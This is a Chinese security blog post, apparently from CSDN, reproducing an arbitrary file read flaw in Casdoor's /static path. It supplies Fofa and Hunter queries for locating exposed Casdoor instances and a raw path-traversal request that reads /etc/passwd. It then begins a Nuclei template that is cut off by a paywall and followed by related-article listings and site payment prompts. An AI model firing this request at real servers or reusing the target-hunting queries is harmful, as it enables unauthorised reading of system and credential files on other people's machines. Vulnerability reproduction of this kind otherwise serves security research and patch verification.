【漏洞复现】Casdoor-任意文件读取

最新推荐文章于 2024-12-20 09:56:36 发布
原创 最新推荐文章于 2024-12-20 09:56:36 发布 · 462 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #网络

本文详细介绍了Casdoor系统中static目录存在的任意文件读取漏洞,包括漏洞描述、资产测绘方法和复现过程。通过Fofa查询和Hunter规则定位到Casdoor系统,利用Nuclei poc进行漏洞验证。

目录

【漏洞介绍】

【资产测绘Query】

【漏洞复现】

【漏洞介绍】

Casdoor系统static存在任意文件读取漏洞

【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。

【资产测绘Query】

Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”

【漏洞复现】

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

图片


【Nuclei-Poc】

id: template-id

info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /static/../../../..
最低0.47元/天 解锁文章
Casdoor系统static任意文件读取漏洞
薛定谔嘚喵博客
10-07 448
Casdoor系统 static 存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器上的敏感文件。
一米OA任意文件读取漏洞
不忘初心,护天下安全!
09-29 900
判断 prop 是否为 activex, 不等于则会去调用系统默认配置的路径 所以filename和extname这两个参数我们可以控制。构造请求前台任意文件读取。System.out.println("警告非法用户,你无访问此页的权限!一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞。首先验证 user 传参是否为空, 需要对 user 参数任意赋值。接着接受3个参数 filename, extname, prop。app="一米OA"
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
weixin_46801402的博客
11-02 1239
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 3234
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
漏洞复现】Office365-GetNext-任意文件读取
知黑而守白
01-23 929
还包括了OneDrive、SharePoint、Teams和Exchange等协作和通信工具,这些工具可以帮助用户:更好地进行团队合作,和信息共享。接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。输入验证与过滤:在处理用户输入时,进行严格的输入验证和过滤。
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
处理casdoor明文传输高危漏洞遇到的问题整理
weixin_55751581的博客
07-05 1375
casdoor处理明文传输问题整理
casdoor SQL注入(CVE-2022-24124)
qq_23003811的博客
07-18 411
Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,简单点说,就是 Casdoor 可以帮你解决 用户管理 的难题,你无需开发用户登录注册等与用户鉴权相关的一系列功能,只需几个步骤,简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor 1.13.1 之前的查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。2、使用sqlmap跑注入点。
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 1326
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
漏洞复现】Casbin casdoor static 任意文件读取漏洞
失心少年
09-20 317
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。Casdoor 是 Casbin 开源社区推出的基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台。Casdoor static 存在任意文件读取漏洞,攻击者通过发送特殊的请求包可以获取服务器中的敏感文件。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 7328
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2936
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境:CVE-2022-24124(Casdoor api get-oraganizations SQL注入)
m0_65712192的博客
07-23 1685
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
单点登录平台Casdoor搭建与使用,集成gitlab同步创建删除账号
12-19 4416
一般来说,公司有很多系统使用,为了实现统一的用户名管理和登录所有系统(如 GitLab、Harbor 等),并在员工离职时只需删除一个主账号即可实现权限清除,可以采用 单点登录 (SSO) 和 集中式身份认证 系统。以下工具都可使用。Keycloak(开源,功能强大且易于部署)Okta/Auth0(商业化解决方案,支持更多高级功能)LDAP(轻量级目录访问协议,可搭配 FreeIPA)Casdoor (轻量级的身份认证和授权平台)
使用 1panel图形化部署LobeChat服务端数据库版
最新发布
sky的折腾日记
12-20 2977
LobeChat 是一个现代化设计的开源 ChatGPT/LLMs 聊天应用与开发框架,支持语音合成、多模态、可扩展的(function call)插件系统,一键免费拥有你自己的 ChatGPT/Gemini/Claude/Ollama 应用。如果你会docker 请看官方教程,而不是此教程,此教程使用的是1panel图形化操作,对于不懂的人来说看的懂,但对于懂的人过于繁琐,docker只需要一句代码。所需要的配置,由于我这边是内网使用,并不使用外网,因此我只需要新建一个桶,和对应的秘钥即可。
Casbin 账号密码泄漏漏洞
LiBai'S BLOG
10-11 3461
Casbin是一个支持如ACL,RBAC,ABAC等访问模型,可用于Golang,Java,C/C++,Node.js,Javascript,PHP,Laravel,Python,.NET(C#),Delphi,Rust,Ruby,Lua(OpenResty),Dart(Flutter)和Elixir的授权库。Casbin的api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取web后台权限。
jQuery-1.7.2版漏洞利用与任意文件读取防范
漏洞的性质是一个任意文件读取漏洞,这意味着任何拥有一定网络知识的攻击者都可以利用这个漏洞,通过浏览器对目标服务器发起请求,读取服务器上的任意文件。这种漏洞的存在是非常严重的,因为它可能导致敏感文件的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值